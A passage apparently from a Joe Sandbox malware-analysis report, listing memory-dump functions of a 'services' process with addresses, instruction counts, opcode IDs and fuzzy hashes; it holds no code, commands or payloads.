                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f7b193918d04a69154213870523edd8578a4327fc8fed5793dc0fc5842bdf9c1
                                                                                                      • Instruction ID: e612c87ad5ad3cade6c352565c881be967e1b10b2ce6f863f1667d4464913a56
                                                                                                      • Opcode Fuzzy Hash: f7b193918d04a69154213870523edd8578a4327fc8fed5793dc0fc5842bdf9c1
                                                                                                      • Instruction Fuzzy Hash: A811D331A1E6AE8EE7129BB9CC311A97760EF46710F064573C044DB1E2DA38660A8BD1
                                                                                                      Function 00007FFD9B8B0C40 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 485641060215c5089ca1ac76e6a3409f4bb16cc355fa71a5d82046a4e92cfbc5
                                                                                                      • Instruction ID: 32dd725e3b6804df6d6e17dfca4d5e35efe63d97be6c687a1608b015e4431833
                                                                                                      • Opcode Fuzzy Hash: 485641060215c5089ca1ac76e6a3409f4bb16cc355fa71a5d82046a4e92cfbc5
                                                                                                      • Instruction Fuzzy Hash: 1711C131A1E6AE8EE7129BB5C8351A97B70EF46710F0645B3C041DB1E2CA386609CB91
                                                                                                      Function 00007FFD9B8B0B77 Relevance: .1, Instructions: 58COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 100edfbf23b8923b8b178dfb49a4fcfb067f323c43b18efacd886eac2c430402
                                                                                                      • Instruction ID: d0a88588201e21466306b075307f6eef4a08e9ccce4657716d8b39fe4fc429c3
                                                                                                      • Opcode Fuzzy Hash: 100edfbf23b8923b8b178dfb49a4fcfb067f323c43b18efacd886eac2c430402
                                                                                                      • Instruction Fuzzy Hash: 63119A31A1864ECFCB85EF28D8419E97BA0FF19348F1511AAE84DD3261C730E666CB81
                                                                                                      Function 00007FFD9B8B0C48 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 38128f6eb5428556868d0c0b9ec4ad4ebe3b838807099de98ee4b2c15b0a77fa
                                                                                                      • Instruction ID: e814c246d9b8a9720c40422e9e16d67bbdc6467fc0bacc5ce69573d415d11100
                                                                                                      • Opcode Fuzzy Hash: 38128f6eb5428556868d0c0b9ec4ad4ebe3b838807099de98ee4b2c15b0a77fa
                                                                                                      • Instruction Fuzzy Hash: 1C11E531E0E29E8FE7129B74CC251A97B70EF46700F0545B3D051DB1E6DB386609CB91
                                                                                                      Function 00007FFD9B8B0C50 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 395b41fce427c4f42d34cab46c0fc085185dc45f4419f0f5902716e968b3a74e
                                                                                                      • Instruction ID: 5b5927dcd98558c9b4343970adc4f6374baa0d012e7bff0f6d0ee387d84608bb
                                                                                                      • Opcode Fuzzy Hash: 395b41fce427c4f42d34cab46c0fc085185dc45f4419f0f5902716e968b3a74e
                                                                                                      • Instruction Fuzzy Hash: 5F01A131E1E29E8EE7129BB4C8255A97B70EF06700F0545B3D451DB1E6DA386609CB91
                                                                                                      Function 00007FFD9B8B06A5 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b322e2b125a15efafd91d0358c9940c516186fffc6da4bfde7966d2b9653c00f
                                                                                                      • Instruction ID: ec1f35f7e06ef25c9fba7967dc4e1b6a3eb36a13dd7882edefe75f9397aae183
                                                                                                      • Opcode Fuzzy Hash: b322e2b125a15efafd91d0358c9940c516186fffc6da4bfde7966d2b9653c00f
                                                                                                      • Instruction Fuzzy Hash: 07F01D70A1961E9AEB50EF69D4596FD77E0FB58301F110437E41CD21A1DA34A2A48B81
                                                                                                      Function 00007FFD9B8B13E0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e9273b05a5c8e65690e21286bf73f7ce5d6d0928165c813e4e6728521f43bf79
                                                                                                      • Instruction ID: b6567fb6a42ccf6a74cf4bda04fdf66fe255027598691d691fc7312a95ee4f8f
                                                                                                      • Opcode Fuzzy Hash: e9273b05a5c8e65690e21286bf73f7ce5d6d0928165c813e4e6728521f43bf79
                                                                                                      • Instruction Fuzzy Hash: 67F0BD70A14A4D9FDF94EF58C448AEA7BE0FF68305F010566F819D3264D730E594CB81
                                                                                                      Function 00007FFD9B8B5E96 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction ID: 516f8178a7545393ea566f954cec370511b108b13a1480f20eda1ea5ed93e8a9
                                                                                                      • Opcode Fuzzy Hash: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction Fuzzy Hash: 1501CC34E1952DCEE775DB65C864BE9B3B1AB54302F1542B5C00D922A1DF386AC48F80
                                                                                                      Function 00007FFD9B8B06C8 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b41a30238d6bb632568e0364e2f473f897e63503955126208c7311c39b53709
                                                                                                      • Instruction ID: 1db17cea56f9ed316bac06f188c6bca019a1096dc3eb88778829866cd7276df2
                                                                                                      • Opcode Fuzzy Hash: 1b41a30238d6bb632568e0364e2f473f897e63503955126208c7311c39b53709
                                                                                                      • Instruction Fuzzy Hash: 1EF0127091554D9FEB94FF65D4896FA77E0FF18305F010466F81CD2165DA34A6A0CB81
                                                                                                      Function 00007FFD9B8B98F1 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cea6056a762a68827c9fc24757fd82b79c0c4c6d713058510b78e008119b8d06
                                                                                                      • Instruction ID: 278d2666ddb763b703821174e420399dce40ea1ee5c4d8a817248a25c370a140
                                                                                                      • Opcode Fuzzy Hash: cea6056a762a68827c9fc24757fd82b79c0c4c6d713058510b78e008119b8d06
                                                                                                      • Instruction Fuzzy Hash: 5FF0B471E0952D8EDBE5DF2C8868AA9A3F1EF5C301F0142F9E00DD22A2DE342AC14F41
                                                                                                      Function 00007FFD9B8B0CD7 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2678e1bc9de07985c16de29c3d4980118a45a37b57811ed3900abb3c0ac82ea0
                                                                                                      • Instruction ID: 3a9e4f6184ab650d3a7f7a31c0061e6ca933b3b8a8f0179929d1a23bcfd6bf12
                                                                                                      • Opcode Fuzzy Hash: 2678e1bc9de07985c16de29c3d4980118a45a37b57811ed3900abb3c0ac82ea0
                                                                                                      • Instruction Fuzzy Hash: F6F0CD30A0962A8BE724DFA4C8A43F9B3B0FB54700F04063AD015932E2CBB86684CFC0
                                                                                                      Function 00007FFD9B8B73E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f69a6ff5921af71ab0aaadf55aca9a6c375108c44de19f8ab8107cb1ce8657af
                                                                                                      • Instruction ID: dac536a66cfa260c76e1dba24e2440bb2c81009c5f623a93129946c445bfb1d6
                                                                                                      • Opcode Fuzzy Hash: f69a6ff5921af71ab0aaadf55aca9a6c375108c44de19f8ab8107cb1ce8657af
                                                                                                      • Instruction Fuzzy Hash: 93F0FE70E0592D8AE7A4DB68DC696A976A1EF84745F1141F6D00D9A2D6CE342E838F40
                                                                                                      Function 00007FFD9B8B9889 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.2067390076.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b8b0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dc9082d7ac61db9382989c2d4c96f57196b01216440bb8b1a126a3cb23fef88b
                                                                                                      • Instruction ID: 48d90c1014724888d936df8002ee7fcd5d56492f6f9fa081ff8cf160b01f292e
                                                                                                      • Opcode Fuzzy Hash: dc9082d7ac61db9382989c2d4c96f57196b01216440bb8b1a126a3cb23fef88b
                                                                                                      • Instruction Fuzzy Hash: 10E06D31E0943D8ADBF0DB5CC858AAAA3B1EB9C301F1142F9D00DD22A2CE346AC18F41

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B880DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9da791d4858a90306fd1360bb486a8a3c9019744c44d550c9900336ad0791b6d
                                                                                                      • Instruction ID: f2c257a1a79a415c4d419d73579b6b8634e58ae1bba88da4ae2f8960329307b9
                                                                                                      • Opcode Fuzzy Hash: 9da791d4858a90306fd1360bb486a8a3c9019744c44d550c9900336ad0791b6d
                                                                                                      • Instruction Fuzzy Hash: E1A1E5B1A19A4D8FE794EBACC8657A97FE1FF99300F4001BAD05AD76D6CB782801C741
                                                                                                      Function 00007FFD9B880B3F Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: c9$!k9$"s9
                                                                                                      • API String ID: 0-3426396564
                                                                                                      • Opcode ID: 16013d0affc05fdd4516774e2f65b387ba3617d3844411356555dbfb2f27c462
                                                                                                      • Instruction ID: 67191786fbd852ad0226e52ef20a30e8f47ff70d1bb99dad77791e1efe00471e
                                                                                                      • Opcode Fuzzy Hash: 16013d0affc05fdd4516774e2f65b387ba3617d3844411356555dbfb2f27c462
                                                                                                      • Instruction Fuzzy Hash: 5D21D436B2864E8FCB44EF1DE4406E977A0FB98329F15017BE808C7251D330A95ACBC0
                                                                                                      Function 00007FFD9B8809B0 Relevance: .2, Instructions: 207COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 72992a28e68a9341f58d189c88aab94f71fc5421a253a34e06c197d0d628afe6
                                                                                                      • Instruction ID: 22e190c33b8dbace2cfa40c9d901aeec1cfcc62965d05c8cf707f7f20eeac137
                                                                                                      • Opcode Fuzzy Hash: 72992a28e68a9341f58d189c88aab94f71fc5421a253a34e06c197d0d628afe6
                                                                                                      • Instruction Fuzzy Hash: 07513B66B0852ACAD71A7BBCB8259FD7B50DF8433CB0802B7E05D8B0D7DD68648693D0
                                                                                                      Function 00007FFD9B88090D Relevance: .2, Instructions: 171COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 49e969adfb367e003b5380f8550282b52a17b55976eedf326524ecd017074526
                                                                                                      • Instruction ID: 539c4ede27945d1a65722e416d19bc969ff53ad94619b8558fd94deb468c4801
                                                                                                      • Opcode Fuzzy Hash: 49e969adfb367e003b5380f8550282b52a17b55976eedf326524ecd017074526
                                                                                                      • Instruction Fuzzy Hash: A1517F71A0855D9FDB58FBA8E8A9AECBBA0FF58318F04017AD01DD7196DE34A8418780
                                                                                                      Function 00007FFD9B8808E8 Relevance: .2, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 29d23d85e2e67aaeb0f7d5777eceb3169ecc7e36485c7cfec18c1a65c6bebe18
                                                                                                      • Instruction ID: 8f8785950abcadec6d3cdd5d60a959342555cea0e637cfb9970c81e63ab09c92
                                                                                                      • Opcode Fuzzy Hash: 29d23d85e2e67aaeb0f7d5777eceb3169ecc7e36485c7cfec18c1a65c6bebe18
                                                                                                      • Instruction Fuzzy Hash: 1651B230A08A0E9FCF54EF98D894AED7BF1FF58354F05016AE419E7261DA34E981CB80
                                                                                                      Function 00007FFD9B883565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 61d7fbc5a6037d4afb9cf983a76e1c5abc19275a6ac4d29ce8b308a0c175bf78
                                                                                                      • Instruction ID: 391ebee0df30370e32f07ba981a92ba55918ea1200f7e5751316c96d41ad0988
                                                                                                      • Opcode Fuzzy Hash: 61d7fbc5a6037d4afb9cf983a76e1c5abc19275a6ac4d29ce8b308a0c175bf78
                                                                                                      • Instruction Fuzzy Hash: A2519B70E0952D8FDBA4DF54C898BA977F0FB68301F5041EA901DE2265DB786A84CF41
                                                                                                      Function 00007FFD9B880998 Relevance: .1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e69b41229905ee3a50480d1d4fcf382568438f13e336d71d49ee2faf32be7afc
                                                                                                      • Instruction ID: 94050386750499588c1cd16cd44777eb1000a622353b4047f651e9160f7c1023
                                                                                                      • Opcode Fuzzy Hash: e69b41229905ee3a50480d1d4fcf382568438f13e336d71d49ee2faf32be7afc
                                                                                                      • Instruction Fuzzy Hash: 02416F30A18A5D9FEB94EFA8C455AEDBBF1FF58355F00017AD409E7295DB346841CB40
                                                                                                      Function 00007FFD9B885AA6 Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 542caecde6c6d5471e9c7b50b78b90ce1eb663ef061886f8323467fa9288d8f4
                                                                                                      • Instruction ID: 57c2e1db5ee60034d794060a9cb47fcdf51fb9543f58524c4bbc464cd37ea2a0
                                                                                                      • Opcode Fuzzy Hash: 542caecde6c6d5471e9c7b50b78b90ce1eb663ef061886f8323467fa9288d8f4
                                                                                                      • Instruction Fuzzy Hash: DA51F734E0A96D8FEBB4DB58CC946E9B3B1EB58301F5542F5D01DA22A1DF396AC48F40
                                                                                                      Function 00007FFD9B880C25 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7a3d00abac36bf1826315e2fff28ca4e2cf56b8aa3293ea60b74a65e44f58017
                                                                                                      • Instruction ID: 0c2acf294a5b48935dead19197ef01c463629d5fe1cbf39c7a3ab01be7d45ac5
                                                                                                      • Opcode Fuzzy Hash: 7a3d00abac36bf1826315e2fff28ca4e2cf56b8aa3293ea60b74a65e44f58017
                                                                                                      • Instruction Fuzzy Hash: E5214F36B0EA8D8FE7229BA8DC211ED7B71EF86711F0545B3C164DB1E2D638260AC751
                                                                                                      Function 00007FFD9B8836E9 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 911ef85b501917fd1c6881335c3ac2d35107a6c3139449ef689d275a93f8bbe8
                                                                                                      • Instruction ID: bb5691b9f6a19964abeca47cdaa18beb8e797e6e49ba5410be0ff898b389f969
                                                                                                      • Opcode Fuzzy Hash: 911ef85b501917fd1c6881335c3ac2d35107a6c3139449ef689d275a93f8bbe8
                                                                                                      • Instruction Fuzzy Hash: CB319A31E0891C9FDBA4DF14C895AE973F1FB69301F5041EA900EE32A5DA75AA80CF42
                                                                                                      Function 00007FFD9B8835FA Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8d586c622fcbd26347bcb6e5f94df3eca7f917aadee6e61dea0876fd23a210d6
                                                                                                      • Instruction ID: e66dcee17f2d65f17ca4ac76a35641627b535ca16c89753912bae953e96edab9
                                                                                                      • Opcode Fuzzy Hash: 8d586c622fcbd26347bcb6e5f94df3eca7f917aadee6e61dea0876fd23a210d6
                                                                                                      • Instruction Fuzzy Hash: 9931BB31E0891C9FCF94DF14C895AE973F0FB69301F5011EA900EE3265CA75AA84CF42
                                                                                                      Function 00007FFD9B885CFB Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e3b2c5e0bd4f311ac1b7d9fc9c00f35b2ff6978a3667967a88cbeada8e312352
                                                                                                      • Instruction ID: 882ea7e3bb2baf7a93f76b77deb0791102c139dcd47fb9909209ee15c15bc199
                                                                                                      • Opcode Fuzzy Hash: e3b2c5e0bd4f311ac1b7d9fc9c00f35b2ff6978a3667967a88cbeada8e312352
                                                                                                      • Instruction Fuzzy Hash: D9319574D5992D8FFBA4DB54C894BE9B3B1AF58301F5042E9D01DA62A1DF786AC4CF00
                                                                                                      Function 00007FFD9B885C22 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a72375df8f097151e488705029577c0aa7706751e25b8edbef70c6fe648d51da
                                                                                                      • Instruction ID: 04062250d7f7ba50711ee603c224e4f90628b5276eef1c247e310ccff8ce4675
                                                                                                      • Opcode Fuzzy Hash: a72375df8f097151e488705029577c0aa7706751e25b8edbef70c6fe648d51da
                                                                                                      • Instruction Fuzzy Hash: FC31C974E19A1D8FEB64DF14CC98BE8B3B1AB58301F4542E5D01D972A1DF346AC58F00
                                                                                                      Function 00007FFD9B880C38 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d25f97215ff27c4e05de1e7b74202e8ec7165a8df14f41181686ce193f5ca186
                                                                                                      • Instruction ID: 42d337e5ff08655db50009f75631f9f97785db2edc46b3e61d3c1110cc7502be
                                                                                                      • Opcode Fuzzy Hash: d25f97215ff27c4e05de1e7b74202e8ec7165a8df14f41181686ce193f5ca186
                                                                                                      • Instruction Fuzzy Hash: 3F113835B1EA8E8FE7129F68CC212E97771EF86710F064573C060DB1E2DA38260A8791
                                                                                                      Function 00007FFD9B880C40 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2fbbfdec48ffa5cd07df0f6a7a36889a80a59a22569b2f224ea4d56fddebf1ce
                                                                                                      • Instruction ID: ade94aabd71d86a7e39d6c3de2023b30fde20e6686bb971aa4b745a23ed6e490
                                                                                                      • Opcode Fuzzy Hash: 2fbbfdec48ffa5cd07df0f6a7a36889a80a59a22569b2f224ea4d56fddebf1ce
                                                                                                      • Instruction Fuzzy Hash: 4E110635E1EA9E8FE7129F64CC212E97B71EF46710F0645B3C061DB1E2CA386609C791
                                                                                                      Function 00007FFD9B880B77 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002E.00000002.2114781712.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_46_2_7ffd9b880000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
